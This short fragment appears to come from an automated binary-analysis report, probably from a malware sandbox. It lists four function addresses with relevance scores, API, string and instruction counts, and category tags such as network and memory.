Function 004919B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 7
networkCOMMON

Function 00491990 Relevance: 1.5, APIs: 1, Instructions: 13
networkCOMMON

Function 00491680 Relevance: 73.8, APIs: 24, Strings: 18, Instructions: 267
memorylibrarystringCOMMON

Function 00491120 Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 92
memoryCOMMON